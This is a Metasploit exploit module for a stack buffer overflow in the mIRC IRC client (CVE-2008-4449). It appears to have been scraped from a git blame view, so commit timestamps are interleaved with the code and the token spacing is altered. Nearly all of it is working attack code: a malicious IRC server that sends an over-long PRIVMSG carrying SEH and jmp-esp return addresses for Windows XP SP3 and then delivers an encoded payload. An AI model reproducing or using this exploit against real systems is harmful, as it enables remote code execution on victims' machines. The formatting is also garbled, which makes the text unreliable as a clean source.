2009-07-15 11:44:55 +00:00
##
2014-10-17 16:47:33 +00:00
# This module requires Metasploit: http://metasploit.com/download
2013-10-15 18:50:46 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
2009-07-15 11:44:55 +00:00
##
2016-03-07 19:19:55 +00:00
class Metasploit3 < Msf :: Exploit :: Remote
2013-08-30 21:28:54 +00:00
Rank = NormalRanking
2009-07-15 11:44:55 +00:00
2013-08-30 21:28:54 +00:00
include Msf :: Exploit :: Remote :: TcpServer
include Msf :: Exploit :: Remote :: Seh
2009-07-15 11:44:55 +00:00
2013-08-30 21:28:54 +00:00
def initialize ( info = { } )
super ( update_info ( info ,
2014-03-11 17:44:34 +00:00
'Name' = > 'mIRC PRIVMSG Handling Stack Buffer Overflow' ,
2013-08-30 21:28:54 +00:00
'Description' = > %q{
This module exploits a buffer overflow in the mIRC IRC Client v6 . 34 and earlier .
By enticing a mIRC user to connect to this server module , an excessively long PRIVMSG
command can be sent , overwriting the stack . Due to size restrictions , ordinal payloads
may be necessary . This module is based on the code by SkD .
} ,
'Author' = > [ 'patrick' ] ,
'License' = > MSF_LICENSE ,
'References' = >
[
[ 'CVE' , '2008-4449' ] ,
[ 'OSVDB' , '48752' ] ,
[ 'BID' , '31552' ] ,
[ 'EDB' , '6666' ]
] ,
'DefaultOptions' = >
{
'EXITFUNC' = > 'process' ,
} ,
'Payload' = >
{
'Space' = > 160 ,
'BadChars' = > " \x00 \x07 \x0a \x0b \x0c \x0d \x20 \x21 \x22 \x23 \x24 \x25 \x27 \x2a \x2c \x2e \x2f \x3a \x3b \x3c \x3e \x3f \x40 \x7b \x7c \x7d " , # This is mostly a guess plus some RFC info.
'StackAdjustment' = > - 3500 ,
} ,
'Platform' = > 'win' ,
'Targets' = >
[
# Patrick - Tested against xpsp3 ok 20090715
[ 'Windows XP SP3' , { 'Rets' = > [
0x7792FBD1 , # SETUPAPI.DLL pop eax pop ret
0x7FFDB5B5 ,
0x779D87B7 , # SETUPAPI.DLL 0x779D87B7 jmp esp
] } ]
] ,
'Privileged' = > false ,
'DisclosureDate' = > 'Oct 02 2008' ,
'DefaultTarget' = > 0 ) )
2009-07-15 11:44:55 +00:00
2013-08-30 21:28:54 +00:00
register_options (
[
OptPort . new ( 'SRVPORT' , [ true , " The IRC server port to listen on " , 6667 ] ) ,
OptString . new ( 'SRVNAME' , [ true , " Welcome to the ... IRC Server Name " , " Internet Relay Network " ] ) ,
] , self . class )
end
2009-07-15 11:44:55 +00:00
2013-08-30 21:28:54 +00:00
def on_client_connect ( client )
2014-05-10 21:31:02 +00:00
return unless regenerate_payload ( client )
2013-08-30 21:28:54 +00:00
print_status ( " Client connected! Sending payload... " )
buffer = " :my_irc_server.com 001 wow :Welcome to the #{ datastore [ 'SRVNAME' ] } wow \r \n "
client . put ( buffer )
end
2009-07-15 11:44:55 +00:00
2013-08-30 21:28:54 +00:00
def on_client_data ( client )
client . get_once
select ( nil , nil , nil , 2 )
sploit = " : " + Rex :: Text . rand_text_alphanumeric ( 307 ) + [ target [ 'Rets' ] [ 0 ] ] . pack ( 'V' ) + [ target [ 'Rets' ] [ 1 ] ] . pack ( 'V' )
sploit << make_nops ( 4 ) + [ target [ 'Rets' ] [ 2 ] ] . pack ( 'V' ) + make_nops ( 4 ) + " B " * 12
sploit << Rex :: Arch :: X86 . jmp_short ( 3 ) + Rex :: Text . rand_text_alphanumeric ( 2 )
sploit << make_nops ( 4 ) + payload . encoded + make_nops ( 4 ) + " PRIVMSG wow : /FINGER wow \r \n "
client . put ( sploit )
2010-04-30 08:40:19 +00:00
2013-08-30 21:28:54 +00:00
handler ( client )
service . close_client ( client )
end
2009-07-15 11:44:55 +00:00
end